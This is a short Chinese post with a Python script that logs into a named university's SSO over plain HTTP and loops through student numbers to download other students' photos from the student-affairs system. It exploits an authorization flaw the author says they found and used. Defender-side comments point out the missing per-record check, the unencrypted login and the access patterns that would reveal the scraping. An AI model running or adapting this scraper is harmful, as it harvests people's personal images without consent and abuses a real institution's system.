最近听同学说学工系统里面有个 bug,试了一下还真有这么回事,就利用这个漏洞爬一下头像咯。
# Session-based login to the campus SSO page, followed by a loop of photo
# requests against the student-affairs system.
#
# Review notes (what this listing shows, read from the defender's side):
# - Every URL below is plain http://, so the login POST carries the username
#   and password unencrypted; the login form should be served over HTTPS only.
# - The photo endpoint is asked for `xh` values taken from a loop counter, not
#   for the logged-in account's own number. If the server answers those
#   requests, as the author reports, it is presumably missing a per-record
#   authorization check (session user vs. requested xh) -- the fix belongs in
#   the showPhoto handler; confirm on the server side.
# - One session requesting many distinct xh values in sequence is the pattern
#   an access-log alert or a rate limit on this endpoint would key on.
# - `start` and `end` are never assigned anywhere in this listing.
import requests
from urllib import request
from lxml import etree

LOGIN_URL = "http://ca.lsu.edu.cn/zfca/login"
ua_headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36"}

# First GET: picks up the session cookie and the login form, which holds the
# value that has to be echoed back in the `lt` field.
session = requests.session()
login_form_html = session.get(LOGIN_URL, headers=ua_headers).text

login_form_tree = etree.HTML(login_form_html)
# presumably a one-time login ticket issued with the form -- TODO confirm
code = login_form_tree.xpath('//*[@id="thetable"]/div[7]/span[1]/input[1]/@value')[0]
print(code)

# Field names as captured from the browser's own login POST.
# The account's own username and password go in the two empty fields.
form = {
    "useValidateCode": "0",
    "isremenberme": "0",
    "ip": "",
    "username": "",
    "password": "",
    "losetime": "240",
    "lt": code,
    "_eventId": "submit",
    "submit1": "",
}

# Log in; the resulting cookies stay on `session` for the requests below.
session.post(LOGIN_URL, data=form, headers=ua_headers)

# Open the student portal page with the logged-in session. The body is read
# but not used afterwards.
portal_url = "http://xggl.lsu.edu.cn/xgxt/stuPage.jsp?jsName=student&caUserName=" + form["username"]
portal_html = session.get(portal_url, headers=ua_headers).text

# One photo request per number in the range; each response body is written
# to ./image/ as received, without looking at the status code or content type.
for student_no in range(start, end):
    photo_url = "http://xggl.lsu.edu.cn/xgxt/xsxx_xsgl.do?method=showPhoto&xh=%s" % student_no
    photo_bytes = session.get(photo_url, headers=ua_headers).content
    with open("./image/%s.jpeg" % student_no, "wb") as out_file:
        out_file.write(photo_bytes)